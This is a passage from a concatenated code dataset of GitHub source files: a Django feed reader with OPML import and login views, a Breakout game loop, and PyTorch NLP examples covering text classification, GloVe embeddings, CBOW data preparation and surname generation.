name = models.SlugField()
type = models.CharField(max_length=8,choices=TYPE_CHOICES)
hint = models.TextField(blank=True)
options = JSONField()
required = models.BooleanField()
def __unicode__(self):
return self.name
class Profile(models.Model):
user = models.ForeignKey(User, related_name='details')
details = JSONField()
def __unicode__(self):
return '%s' % self.user.username
``` |
{
"source": "jochenklar/reader2",
"score": 2
} |
#### File: reader2/feeds/exceptions.py
```python
class FeedException(Exception):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message')
```
#### File: management/commands/loadopml.py
```python
from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
import xml.etree.ElementTree as et
from feeds.models import Category, Subscription, Feed, Meta
class Command(BaseCommand):
help = 'Imports categories and subscriptions from an OPML file.'
def add_arguments(self, parser):
parser.add_argument('username', help='Import feeds for this user')
parser.add_argument('opmlfile', help='OPML file')
def handle(self, *args, **options):
try:
user = User.objects.get(username=options['username'])
except (IndexError, User.DoesNotExist):
raise CommandError('No valid username given.')
try:
xml = et.parse(options['opmlfile'])
except (IndexError, IOError):
raise CommandError('No valid inputfile given.')
for categoryNode in xml.find('body').findall('outline'):
categoryTitle = categoryNode.attrib['title']
print(' category %s' % categoryTitle)
try:
category = Category.objects.get(title=categoryTitle,user=user)
except Category.DoesNotExist:
category = Category(title=categoryTitle,user=user)
category.save()
for subscriptionNode in categoryNode.findall('outline'):
subscriptionTitle = subscriptionNode.attrib['title']
subscriptionXmlUrl = subscriptionNode.attrib['xmlUrl']
print(' subscription %s' % subscriptionTitle)
try:
feed = Feed.objects.get(xmlUrl=subscriptionXmlUrl)
except Feed.DoesNotExist:
feed = Feed(xmlUrl=subscriptionXmlUrl)
feed.fetchItems()
feed.save()
try:
subscription = Subscription.objects.get(category=category,feed=feed)
except Subscription.DoesNotExist:
subscription = Subscription(category=category,feed=feed)
subscription.save()
```
#### File: reader2/reader/views.py
```python
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.contrib.auth import authenticate as auth_authenticate
from django.contrib.auth import login as auth_login
from django.contrib.auth import logout as auth_logout
from .forms import LoginForm
from feeds.models import Meta
def index(request):
if request.user.is_authenticated:
return render(request,'layout.html', {'updated': Meta.load().updated})
else:
return HttpResponseRedirect('/login/')
def login(request):
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
values = form.cleaned_data
user = auth_authenticate(username=values['username'], password=values['password'])
if user is not None:
if user.is_active:
auth_login(request, user)
return HttpResponseRedirect('/')
else:
form = LoginForm()
return render(request,'layout.html',{'form': form, 'login': True})
def logout(request):
auth_logout(request)
return HttpResponseRedirect('/login/')
``` |
{
"source": "jochenklar/verlustdernacht",
"score": 3
} |
#### File: management/commands/create-nights.py
```python
from datetime import datetime, timedelta
from django.core.management.base import BaseCommand
from api.utils import create_night
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('location', action='store', help='Location for this night')
parser.add_argument('start', action='store', default=False, help='Start date')
parser.add_argument('end', action='store', default=False, help='End date')
def handle(self, *args, **options):
start_date = datetime.strptime(options['start'], '%Y-%m-%d')
end_date = datetime.strptime(options['end'], '%Y-%m-%d')
date = start_date
while date <= end_date:
print(date.strftime('%Y-%m-%d'))
create_night(options['location'], date.strftime('%Y-%m-%d'))
date += timedelta(1)
``` |
{
"source": "JochenMa/stancode_projects",
"score": 3
} |
#### File: stancode_projects/breakout_game/breakout.py
```python
from campy.gui.events.timer import pause
from breakoutgraphics import BreakoutGraphics
FRAME_RATE = 1000 / 120 # 120 frames per second
def main():
graphics = BreakoutGraphics()
# Add animation loop here!
while True:
graphics.collision() # detect collision
graphics.ball_move() # move the ball
pause(FRAME_RATE)
graphics.win_or_lose() # detect win or lose
if graphics.end_game(): # when the game is ended, break the loop
break
if graphics.win:
# For bonus game
graphics.bonus()
while True:
graphics.collision()
graphics.ball_move()
graphics.move_drop()
pause(FRAME_RATE)
if graphics.bonus_end():
break
pause(FRAME_RATE*200) # animation for showing final score board
graphics.final_score_board() # final score board
if __name__ == '__main__':
main()
``` |
{
"source": "Jochen-M/pytorch_nlp",
"score": 2
} |
#### File: examples/commons/helper.py
```python
import os
import re
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
def describe(x: torch.Tensor):
print(f"Type: {x.type()}")
print(f"Shape/size: {x.shape}")
print(f"Values: \n{x}")
def preprocess_text(text):
text = text.lower()
text = re.sub(r"([.,!?])", r" \1 ", text)
text = re.sub(r"[^a-zA-Z.,!?]+", r" ", text)
return text
def make_train_state(args):
return {"stop_early": False,
"early_stopping_step": 0,
"early_stopping_best_val": 1e8,
"learning_rate": args.learning_rate,
"epoch_index": 0,
"train_loss": [],
"train_acc": [],
"val_loss": [],
"val_acc": [],
"test_loss": -1,
"test_acc": -1,
"model_filename": args.model_state_file}
def update_train_state(args, model, train_state):
""" Handle the training state updates.
Components:
- Early Stopping: Prevent overfitting.
- Model Checkpoint: Model is saved if the model is better
:param args: main arguments
:param model: model to train
:param train_state: a dictionary representing the training state values
:returns: a new train_state
"""
# Save one model at least
if train_state["epoch_index"] == 0:
torch.save(model.state_dict(), train_state["model_filename"])
train_state["stop_early"] = False
# Save model if performance improved
elif train_state["epoch_index"] >= 1:
loss_tm1, loss_t = train_state["val_loss"][-2:]
# If loss worsened
if loss_t >= train_state["early_stopping_best_val"]:
# Update step
train_state["early_stopping_step"] += 1
# Loss decreased
else:
# Save the best model
if loss_t < train_state["early_stopping_best_val"]:
torch.save(model.state_dict(), train_state["model_filename"])
# Rest early stopping step
train_state["early_stopping_step"] = 0
# Update early_stopping_best_val
train_state["early_stopping_best_val"] = loss_t
# Stop early ?
train_state["stop_early"] = \
train_state["early_stopping_step"] >= args.early_stopping_criteria
return train_state
def compute_accuracy(y_pred, y_target):
if y_pred.shape[1] == 1:
y_pred_indices = (torch.sigmoid(y_pred) > 0.5).long()
else:
_, y_pred_indices = y_pred.max(dim=1)
n_correct = torch.eq(y_pred_indices, y_target).sum().item()
return n_correct / len(y_pred_indices) * 100
def set_seed_everywhere(seed, cuda):
np.random.seed(seed)
torch.manual_seed(seed)
if cuda:
torch.cuda.manual_seed_all(seed)
def handle_dirs(dirpath):
if not os.path.exists(dirpath):
os.makedirs(dirpath)
def load_glove_from_file(glove_filepath):
""" Load the GloVe embeddings
:param glove_filepath: path to the glove embeddings file
:return: word_to_index (dict), embeddings (numpy.ndarary)
"""
word_to_index = {}
embeddings = []
with open(glove_filepath, "r", encoding="utf8") as fp:
for index, line in enumerate(fp):
line = line.split(" ")
word_to_index[line[0]] = index
embeddings_i = np.array([float(val) for val in line[1:]])
embeddings.append(embeddings_i)
return word_to_index, np.stack(embeddings)
def make_embedding_matrix(glove_filepath, words):
""" Create embedding matrix for a specific set of words.
:param glove_filepath: file path to the glove embeddigns
:param words (list): list of words in the dataset
"""
word_to_idx, glove_embeddings = load_glove_from_file(glove_filepath)
embedding_size = glove_embeddings.shape[1]
final_embeddings = np.zeros((len(words), embedding_size))
for i, word in enumerate(words):
if word in word_to_idx:
final_embeddings[i, :] = glove_embeddings[word_to_idx[word]]
else:
embedding_i = torch.ones(1, embedding_size)
nn.init.xavier_uniform_(embedding_i)
final_embeddings[i, :] = embedding_i
return final_embeddings
def generate_batches(dataset, batch_size, shuffle=True, drop_last=True, device="cpu"):
""" A generator function which wraps the PyTorch DataLoader.
It will ensure each tensor is on the write device location.
"""
dataloader = DataLoader(dataset=dataset, batch_size=batch_size,
shuffle=shuffle, drop_last=drop_last)
for data_dict in dataloader:
out_data_dict = {}
for name, tensor in data_dict.items():
out_data_dict[name] = data_dict[name].to(device)
yield out_data_dict
def normalize_sizes(y_pred, y_true):
""" Normalize tensor sizes
:param y_pred: (torch.Tensor) the output of the model
If a 3-dimensional tensor, reshapes to a matrix
:param y_true: (torch.Tensor) the target predictions
If a matrix, reshapes to be a vector
"""
if len(y_pred.size()) == 3:
y_pred = y_pred.contiguous().view(-1, y_pred.size(2))
if len(y_true.size()) == 2:
y_true = y_true.contiguous().view(-1)
return y_pred, y_true
def sequence_loss(y_pred, y_true, mask_index):
y_pred, y_true = normalize_sizes(y_pred, y_true)
return F.cross_entropy(y_pred, y_true, ignore_index=mask_index)
def compute_accuracy(y_pred, y_true, mask_index):
y_pred, y_true = normalize_sizes(y_pred, y_true)
_, y_pred_indices = y_pred.max(dim=1)
correct_indices = torch.eq(y_pred_indices, y_true).float()
valid_indices = torch.ne(y_true, mask_index).float()
n_correct = (correct_indices * valid_indices).sum().item()
n_valid = valid_indices.sum().item()
return n_correct / n_valid * 100
```
#### File: examples/continuous_bag_of_words_embeddings/munging_frankenstein.py
```python
import nltk.data
import pandas as pd
from tqdm import tqdm_notebook
from argparse import Namespace
from examples.commons.helper import preprocess_text
args = Namespace(
raw_dataset_txt="../../data/books/frankenstein.txt",
window_size=5,
mask_token="<MASK>",
train_proportion=0.7,
val_proportion=0.15,
test_proportion=0.15,
output_munged_csv="../../data/books/output_munged.csv",
seed=7676
)
# Split the raw text book into sentences
tokenizer = nltk.data.load("tokenizers/punkt/english.pickle")
with open(args.raw_dataset_txt) as fp:
book = fp.read()
sentences = tokenizer.tokenize(book)
print(len(sentences), "sentences")
print("Sample:", sentences[100])
cleaned_sentences = [preprocess_text(sentence)
for sentence in sentences]
# Create windows
flatten = lambda outer_list: [item
for inner_list in outer_list
for item in inner_list]
windows = flatten([list(nltk.ngrams([args.mask_token] * args.window_size +
sentence.split(" ") +
[args.mask_token] * args.window_size,
args.window_size * 2 + 1))
for sentence in tqdm_notebook(cleaned_sentences)])
# Create cbow data
data = []
for window in tqdm_notebook(windows):
target_token = window[args.window_size]
context = []
for i, token in enumerate(window):
if token == args.mask_token or i == args.window_size:
continue
else:
context.append(token)
data.append([" ".join(token for token in context), target_token])
# Convert to dataframe
cbow_data = pd.DataFrame(data, columns=["context", "target"])
# Create split data
n = len(cbow_data)
def get_split(row_num):
if row_num <= n*args.train_proportion:
return "train"
elif n*args.train_proportion < row_num <= n*args.train_proportion + n*args.val_proportion:
return "val"
else:
return "test"
cbow_data["split"] = cbow_data.apply(lambda row: get_split(row.name), axis=1)
print(cbow_data.head())
# Write split data to file
cbow_data.to_csv(args.output_munged_csv, index=False)
```
#### File: examples/continuous_bag_of_words_embeddings/vocabulary.py
```python
class Vocabulary(object):
""" Class to process text and extract Vocabulary for mapping"""
def __init__(self, token_to_idx=None, mask_token="<MASK>", add_unk=True, unk_token="<UNK>"):
"""
:param token_to_idx (dict): a preexisting map of tokens to indices
:param add_unk (bool): a flag that indicates whether to add the UNK token
:param unk_token (str): the UNK token to add into the Vocabulary
"""
if token_to_idx is None:
token_to_idx = {}
self._token_to_idx = token_to_idx
self._idx_to_token = {idx: token
for token, idx in self._token_to_idx.items()}
self._mask_token = mask_token
self.mask_index = self.add_token(self._mask_token)
self._add_unk = add_unk
self._unk_token = unk_token
self.unk_index = -1
if add_unk:
self.unk_index = self.add_token(unk_token)
def to_serializable(self):
""" Returns a dictionary that can be serialized """
return {"token_to_idx": self._token_to_idx,
"add_unk": self._add_unk,
"unk_token": self._unk_token}
@classmethod
def from_serializable(cls, contents):
""" Instantiates the Vocabulary from a serialized dictionary """
return cls(**contents)
def add_token(self, token):
""" Update mapping dicts based on the token.
:param token (str): the item to add into the Vocabulary
:return index (int): the integer corresponding to the token
"""
if token in self._token_to_idx:
index = self._token_to_idx[token]
else:
index = len(self._token_to_idx)
self._token_to_idx[token] = index
self._idx_to_token[index] = token
return index
def add_many(self, tokens):
""" Add a list of tokens into the Vocabulary
:param tokens (list): a list of string tokens
:return indices (list): a list of indices corresponding to the tokens
"""
return [self.add_token(token) for token in tokens]
def lookup_token(self, token):
""" Retrieve the index associated with the token
or the UNK index if token isn't present.
:param token (str): the token to look up
:return index (int): the index corresponding to the token
Notes: `unk_index` needs to be >=0 (having been added into the Vocabulary)
for the UNK functionality
"""
if self.unk_index >= 0:
return self._token_to_idx.get(token, self.unk_index)
else:
return self._token_to_idx[token]
def lookup_index(self, index):
"""Return the token associated with the index
:param index (int): the index to look up
:return token (str): the token corresponding to the index
Raises: KeyError: if the index is not in the Vocabulary
"""
if index not in self._idx_to_token:
raise KeyError("The index (%d) is not in the Vocabulary" % index)
return self._idx_to_token[index]
def __str__(self):
return "<Vocabulary(size=%d)>" % len(self)
def __len__(self):
return len(self._token_to_idx)
```
#### File: examples/doc_classification_with_pretrained_embeddings/cnn.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class CNN(nn.Module):
def __init__(self, embedding_size, num_embeddings, num_channels,
hidden_dim, num_classes, dropout_p,
pretrained_embeddings=None, padding_idx=0):
super(CNN, self).__init__()
if pretrained_embeddings is None:
self.emb = nn.Embedding(embedding_dim=embedding_size,
num_embeddings=num_embeddings,
padding_idx=padding_idx)
else:
pretrained_embeddings = torch.from_numpy(pretrained_embeddings).float()
self.emb = nn.Embedding(embedding_dim=embedding_size,
num_embeddings=num_embeddings,
padding_idx=padding_idx,
_weight=pretrained_embeddings)
self.convnet = nn.Sequential(
nn.Conv1d(in_channels=embedding_size,
out_channels=num_channels,
kernel_size=3),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3,
stride=2),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3,
stride=2),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3),
nn.ELU()
)
self._dropout_p = dropout_p
self.fc1 = nn.Linear(num_channels, hidden_dim)
self.fc2 = nn.Linear(hidden_dim, num_classes)
def forward(self, x_in, apply_softmax=False):
# embed and permute so features are channels
x_embedded = self.emb(x_in).permute(0, 2, 1)
features = self.convnet(x_embedded)
# average and remove the extra dimension
remaining_size = features.size(dim=2)
features = F.avg_pool1d(features, remaining_size).squeeze(dim=2)
features = F.dropout(features, p=self._dropout_p)
# final linear layer to produce classification outputs
intermediate_vector = F.relu(F.dropout(self.fc1(features),
p=self._dropout_p))
prediction_vector = self.fc2(intermediate_vector)
if apply_softmax:
prediction_vector = F.softmax(prediction_vector, dim=1)
return prediction_vector
```
#### File: examples/doc_classification_with_pretrained_embeddings/pretrained_embeddings.py
```python
import numpy as np
from annoy import AnnoyIndex
class PreTrainedEmbeddings(object):
def __init__(self, word_to_index, word_vectors):
"""
:param word_to_index (dict): mapping from word to integers
:param word_vectors (list of numpy arrays)
"""
self.word_to_index = word_to_index
self.word_vectors = word_vectors
self.index_to_word = \
{v: k for k, v in self.word_to_index.items()}
self.index = AnnoyIndex(len(word_vectors[0]),
metric="euclidean")
for _, i in self.word_to_index.items():
self.index.add_item(i, self.word_vectors[i])
self.index.build(50)
@classmethod
def from_embeddings_file(cls, embedding_file="../data/glove/glove.100d.txt"):
""" Instantiate from pre-trained vector file.
Vector file should be of the format:
word0 x0_0 x0_1 x0_2 x0_3 ... x0_N
word1 x1_0 x1_1 x1_2 x1_3 ... x1_N
:param embedding_file: location of the file
:return instance of PreTrainedEmbeddings
"""
word_to_index = {}
word_vectors = []
with open(embedding_file, encoding="utf8") as fp:
for line in fp.readlines():
line = line.split(" ")
word = line[0]
vec = np.array([float(x) for x in line[1:]])
word_to_index[word] = len(word_to_index)
word_vectors.append(vec)
return cls(word_to_index, word_vectors)
def get_embedding(self, word):
"""
:param word: str
:return: an embedding (numpy.ndarray)
"""
return self.word_vectors[self.word_to_index[word]]
def get_closest_to_vector(self, vector, n=1):
""" Given a vector, return its n nearest neighbors
:param vector: (np.ndarray) should match the size of the vectors in the Annoy index
:param n: (int) the number of neighbors to return
:return [str, str, ...]: words nearest to the given vector The words are not ordered by distance
"""
nn_indeices = self.index.get_nns_by_vector(vector, n)
return [self.index_to_word[neighbor]
for neighbor in nn_indeices]
def compute_and_print_analogy(self, word1, word2, word3):
vec1 = self.get_embedding(word1)
vec2 = self.get_embedding(word2)
vec3 = self.get_embedding(word3)
# Simple hypothesis: Analogy is a spatial relationship
spatial_relationship = vec2 - vec1
vec4 = vec3 + spatial_relationship
closest_words = self.get_closest_to_vector(vec4, n=4)
existing_words = set([word1, word2, word3])
closest_words = [word for word in closest_words
if word not in existing_words]
if len(closest_words) == 0:
print("Could not find nearest neighbors for the vector!")
return
for word4 in closest_words:
print("{} : {} :: {} : {}".format(word1, word2, word3, word4))
if __name__ == "__main__":
embeddings = PreTrainedEmbeddings.from_embeddings_file("../data/glove/glove.100d.txt")
# Relationship 1: the relationship between gendered nouns and pronoun
embeddings.compute_and_print_analogy("man", "he", "woman")
# Relationship 2: Verb-noun relationships
embeddings.compute_and_print_analogy("fly", "plane", "sail")
# Relationship 3: Noun-noun relationships
embeddings.compute_and_print_analogy("cat", "kitten", "dog")
# Relationship 4: Hypernymy (broader category)
embeddings.compute_and_print_analogy('blue', 'color', 'dog')
# Relationship 5: Meronymy (parttowhole)
embeddings.compute_and_print_analogy('toe', 'foot', 'finger')
# Relationship 6: Troponymy (difference in manner)
embeddings.compute_and_print_analogy('talk', 'communicate', 'read')
# Relationship 7: Metonymy (convention / figures of speech)
embeddings.compute_and_print_analogy('blue', 'democrat', 'red')
# Relationship 8: Adjectival scales
embeddings.compute_and_print_analogy('fast', 'fastest', 'young')
# An example illustrating the danger of using cooccurrences to encode meaning — sometimes they do not!
embeddings.compute_and_print_analogy('fast', 'fastest', 'small')
# Watch out for protected attributes such as gender encoded in word embeddings.
# This can introduce unwanted biases in downstream models.
embeddings.compute_and_print_analogy("man", "king", "woman")
# Cultural gender bias encoded in vector analogy
embeddings.compute_and_print_analogy("man", "doctor", "woman")
```
#### File: examples/doc_classification_with_pretrained_embeddings/train.py
```python
import sys
sys.path.append("../../")
import os
import torch
from tqdm import tqdm_notebook
from torch import nn
from torch import optim
from argparse import Namespace
from examples.commons import helper
from examples.doc_classification_with_pretrained_embeddings.cnn import CNN
from examples.doc_classification_with_pretrained_embeddings.news_dataset import NewsDataset
args = Namespace(
news_csv="../../data/ag_news/output_munged.csv",
vectorizer_file="vectorizer.json",
model_state_file="model.pth",
save_dir="../../model_storage/doc_classification",
glove_filepath="../../data/glove/glove.6B.300d.txt",
use_glove=True,
embedding_size=300,
hidden_dim=100,
num_channels=100,
seed=7676,
learning_rate=1e-3,
dropout_p=0.1,
batch_size=128,
num_epochs=100,
early_stopping_criteria=5,
cuda=True,
catch_keyboard_interrupt=True,
reload_from_files=False,
expand_filepaths_to_save_dir=True
)
def predict_category(title, classifier, vectorizer, max_length):
title = helper.preprocess_text(title)
vectorized_title = torch.tensor(vectorizer.vectorize(title, vector_length=max_length))
result = classifier(vectorized_title.unsqueeze(0), apply_softmax=True)
probability_values, indices = result.max(dim=1)
predicted_category = vectorizer.category_vocab.lookup_index(indices.item())
return {"category": predicted_category,
"probability": probability_values.item()}
def get_samples(k=5):
samples = {}
for cat in dataset.val_df.category.unique():
samples[cat] = dataset.val_df.title[dataset.val_df.category == cat].tolist()[:k]
return samples
# Prep work
if args.expand_filepaths_to_save_dir:
args.vectorizer_file = os.path.join(args.save_dir, args.vectorizer_file)
args.model_state_file = os.path.join(args.save_dir, args.model_state_file)
print("Expanded filepaths:")
print("\t{}".format(args.vectorizer_file))
print("\t{}".format(args.model_state_file))
# Check CUDA
if not torch.cuda.is_available():
args.cuda = False
args.device = torch.device("cuda" if args.cuda else "cpu")
print("Using CUDA: {}".format(args.cuda))
# Set seed for reproducibility
helper.set_seed_everywhere(args.seed, args.cuda)
# handle dirs
helper.handle_dirs(args.save_dir)
# Initializations
if args.reload_from_files:
# training from a checkpoint
print("Loading dataset and vectorizer")
dataset = NewsDataset.load_dataset_and_load_vectorizer(
args.news_csv, args.vectorizer_file)
else:
print("Loading dataset and creating vectorizer")
# create dataset and vectorizer
dataset = NewsDataset.load_dataset_and_make_vectorizer(args.news_csv)
dataset.save_vectorizer(args.vectorizer_file)
vectorizer = dataset.get_vectorizer()
# Use GloVe or randomly initialized embeddings
if args.use_glove:
words = vectorizer.title_vocab._token_to_idx.keys()
embeddings = helper.make_embedding_matrix(glove_filepath=args.glove_filepath,
words=words)
print("Using pre-trained embeddings")
else:
embeddings = None
print("Not using pre-trained embeddings")
classifier = CNN(embedding_size=args.embedding_size,
num_embeddings=len(vectorizer.title_vocab),
num_channels=args.num_channels,
hidden_dim=args.hidden_dim,
num_classes=len(vectorizer.category_vocab),
dropout_p=args.dropout_p,
pretrained_embeddings=embeddings,
padding_idx=0)
classifier = classifier.to(args.device)
dataset.class_weights = dataset.class_weights.to(args.device)
# loss and optimier
loss_func = nn.CrossEntropyLoss()
optimizer = optim.Adam(classifier.parameters(), lr=args.learning_rate)
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimizer,
mode="min",
factor=0.5,
patience=1)
# Training loop
train_state = helper.make_train_state(args)
epoch_bar = tqdm_notebook(desc="training routine",
total=args.num_epochs,
position=0)
dataset.set_split("train")
train_bar = tqdm_notebook(desc="split=train",
total=dataset.get_num_batches(args.batch_size),
position=1,
leave=True)
dataset.set_split("val")
val_bar = tqdm_notebook(desc="split=val",
total=dataset.get_num_batches(args.batch_size),
position=1,
leave=True)
try:
for epoch_index in range(args.num_epochs):
train_state["epoch_index"] = epoch_index
dataset.set_split("train")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.
running_acc = 0.
classifier.train()
for batch_index, batch_dict in enumerate(batch_generator):
optimizer.zero_grad()
y_pred = classifier(batch_dict["x_data"])
loss = loss_func(y_pred, batch_dict["y_target"])
loss_t = loss.item()
running_loss += (loss_t - running_loss) / (batch_index + 1)
loss.backward()
optimizer.step()
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"])
running_acc += (acc_t - running_acc) / (batch_index + 1)
train_bar.set_postfix(loss=running_loss,
acc=running_acc,
epoch=epoch_index)
train_bar.update()
train_state["train_loss"].append(running_loss)
train_state["train_acc"].append(running_acc)
dataset.set_split("val")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.
running_acc = 0.
classifier.eval()
for batch_index, batch_dict in enumerate(batch_generator):
y_pred = classifier(batch_dict["x_data"])
loss = loss_func(y_pred, batch_dict["y_target"])
loss_t = loss.item()
running_loss += (loss_t - running_loss) / (batch_index + 1)
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"])
running_acc += (acc_t - running_acc) / (batch_index + 1)
val_bar.set_postfix(loss=running_loss,
acc=running_acc,
epoch=epoch_index)
val_bar.update()
train_state["val_loss"].append(running_loss)
train_state["val_acc"].append(running_acc)
train_state = helper.update_train_state(args=args,
model=classifier,
train_state=train_state)
scheduler.step(train_state["val_loss"][-1])
# if train_state["stop_early"]:
# break
train_bar.n = 0
val_bar.n = 0
epoch_bar.update()
print(f"Epoch {epoch_index}")
except KeyboardInterrupt:
print("Exiting loop")
classifier.load_state_dict(torch.load(train_state["model_filename"]))
classifier = classifier.to(args.device)
dataset.class_weights = dataset.class_weights.to(args.device)
loss_func = nn.CrossEntropyLoss(dataset.class_weights)
dataset.set_split("test")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.
running_acc = 0.
classifier.eval()
for batch_index, batch_dict in enumerate(batch_generator):
y_pred = classifier(batch_dict["x_data"])
loss = loss_func(y_pred, batch_dict["y_target"])
loss_t = loss.item()
running_loss += (loss_t - running_loss) / (batch_index + 1)
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"])
running_acc += (acc_t - running_acc) / (batch_index + 1)
train_state["test_loss"] = running_loss
train_state["test_acc"] = running_acc
print(f"Test loss: {train_state['test_loss']}")
print(f"Test acc: {train_state['test_acc']}")
classifier = classifier.to("cpu")
val_samples = get_samples()
for truth, sample_group in val_samples.items():
print(f"True Category: {truth}")
print("=" * 30)
for sample in sample_group:
prediction = predict_category(sample,
classifier,
vectorizer,
dataset._max_seq_length + 1)
print("Prediction: {} (p={:.2f})".format(prediction["category"],
prediction["probability"]))
print("\t + Sample: {}".format(sample))
print("-" * 30)
```
#### File: examples/review_sentiment_classification_with_perceptron/perceptron.py
```python
import torch
import torch.nn as nn
class Perceptron(nn.Module):
""" A simple perceptronbased classifier """
def __init__(self, num_features):
"""
:param num_features (int): the size of the input feature vector
"""
super(Perceptron, self).__init__()
self.fc1 = nn.Linear(in_features=num_features, out_features=1)
def forward(self, x_in, apply_sigmoid=False):
"""The forward pass of the classifier
:param x_in (torch.Tensor): an input data tensor.
x_in.shape should be (batch, num_features)
:param apply_sigmoid (bool): a flag for the sigmoid activation
should be false if used with the Cross Entropy losses
:return the resulting tensor. tensor.shape should be (batch,)
"""
y_out = self.fc1(x_in).squeeze()
if apply_sigmoid:
y_out = torch.sigmoid(y_out)
return y_out
```
#### File: examples/surname_classification_with_cnn/cnn.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class CNN(nn.Module):
def __init__(self, initial_num_channels, num_classes, num_channels):
super(CNN, self).__init__()
self.convnet = nn.Sequential(
nn.Conv1d(in_channels=initial_num_channels,
out_channels=num_channels,
kernel_size=3),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3,
stride=2),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3,
stride=2),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3),
nn.ELU()
)
self.fc = nn.Linear(num_channels, num_classes)
def forward(self, x_surname, apply_softmax=False):
features = self.convnet(x_surname).squeeze(dim=2)
prediction_vector = self.fc(features)
if apply_softmax:
prediction_vector = F.softmax(prediction_vector, dim=1)
return prediction_vector
if __name__ == "__main__":
batch_size = 2
one_hot_size = 10
sequence_width = 7
data = torch.randn(batch_size, one_hot_size, sequence_width)
conv1 = nn.Conv1d(in_channels=one_hot_size, out_channels=16, kernel_size=3)
conv1_bn = nn.BatchNorm1d(num_features=16)
conv2 = nn.Conv1d(in_channels=16, out_channels=32, kernel_size=3)
conv3 = nn.Conv1d(in_channels=32, out_channels=64, kernel_size=3)
intermediate1 = conv1(data)
intermediate1_bn = conv1_bn(intermediate1)
intermediate2 = conv2(intermediate1)
intermediate3 = conv3(intermediate2)
print(data.size())
print(intermediate1.size())
print(intermediate1_bn.size())
print(intermediate2.size())
print(intermediate3.size())
print(intermediate1)
print(intermediate1_bn)
# print(intermediate1.view(batch_size, -1).size())
# print(torch.mean(intermediate1, dim=2).size())
# print(torch.max(intermediate1, dim=2))
# print(torch.sum(intermediate1, dim=2))
# cnn = CNN(85, 18, 256)
# print(cnn)
```
#### File: examples/surname_generation/train.py
```python
import sys
sys.path.append("../../")
import os
import torch
import numpy as np
import torch.nn.functional as F
from tqdm import tqdm_notebook
from torch import optim
from argparse import Namespace
from examples.commons import helper
from examples.surname_generation.surname_dataset import SurnameDataset
from examples.surname_generation.conditional_generation_model import ConditionalGenerationModel
from examples.surname_generation.unconditional_generation_model import UnconditionalGenerationModel
args = Namespace(
surname_csv="../../data/surnames/output_munged.csv",
vectorizer_file="vectorizer.json",
model_state_file="model.pth",
save_dir="../../model_storage/surnames_generation/",
char_embedding_size=64,
rnn_hidden_size=32,
num_epochs=100,
batch_size=128,
learning_rate=1e-3,
seed=7676,
early_stopping_criteria=5,
cuda=True,
catch_keyboard_interrupt=True,
reload_from_files=False,
expand_filepaths_to_save_dir=True,
conditional=True
)
def sample_from_unconditional_model(model, vectorizer, num_samples=1, sample_size=20, temperature=1.0):
""" Sample a sequence of indices from the model
:param model: (SurnameGenerationModel) the trained model
:param vectorizer: (SurnameVectorizer) the corresponding vectorizer
:param num_samples: (int) the number of samples
:param sample_size: (int) the max length of the samples
:param temperature: (float) accentuates or flattens the distribution.
0.0 < temperature < 1.0 will make it peakier.
temperature > 1.0 will make it more uniform
:return: indices (torch.Tensor): the matrix of indices;
shape = (num_samples, sample_size)
"""
begin_seq_index = [vectorizer.character_vocab.begin_seq_index for _ in range(num_samples)]
begin_seq_index = torch.tensor(begin_seq_index,
dtype=torch.int64).unsqueeze(dim=1)
indices = [begin_seq_index]
h_t = None
for time_step in range(sample_size):
x_t = indices[time_step]
x_emb_t = model.char_emb(x_t)
rnn_out_t, h_t = model.rnn(x_emb_t, h_t)
prediction_vector = model.fc(rnn_out_t.squeeze(dim=1))
probability_vector = F.softmax(prediction_vector / temperature, dim=1)
indices.append(torch.multinomial(probability_vector, num_samples=1))
indices = torch.stack(indices).squeeze().permute(1, 0)
return indices
def sample_from_conditional_model(model, vectorizer, nationalities, sample_size=20, temperature=1.0):
""" Sample a sequence of indices from the model
:param model: (SurnameGenerationModel) the trained model
:param vectorizer: (SurnameVectorizer) the corresponding vectorizer
:param nationalities: (list) a list of integers representing nationalities
:param sample_size: (int) the max length of the samples
:param temperature: (float) accentuates or flattens the distribution.
0.0 < temperature < 1.0 will make it peakier.
temperature > 1.0 will make it more uniform
:return: indices (torch.Tensor): the matrix of indices;
shape = (num_samples, sample_size)
"""
num_samples = len(nationalities)
begin_seq_index = [vectorizer.character_vocab.begin_seq_index
for _ in range(num_samples)]
begin_seq_index = torch.tensor(begin_seq_index,
dtype=torch.int64).unsqueeze(dim=1)
indices = [begin_seq_index]
nationality_indices = torch.tensor(nationalities, dtype=torch.int64).unsqueeze(dim=0)
h_t = model.nation_emb(nationality_indices)
for time_step in range(sample_size):
x_t = indices[time_step]
x_emb_t = model.char_emb(x_t)
rnn_out_t, h_t = model.rnn(x_emb_t, h_t)
prediction_vector = model.fc(rnn_out_t.squeeze(dim=1))
probability_vector = F.softmax(prediction_vector / temperature, dim=1)
indices.append(torch.multinomial(probability_vector, num_samples=1))
indices = torch.stack(indices).squeeze().permute(1, 0)
return indices
def decode_samples(sampled_indices, vectorizer):
decoded_surnames = []
vocab = vectorizer.character_vocab
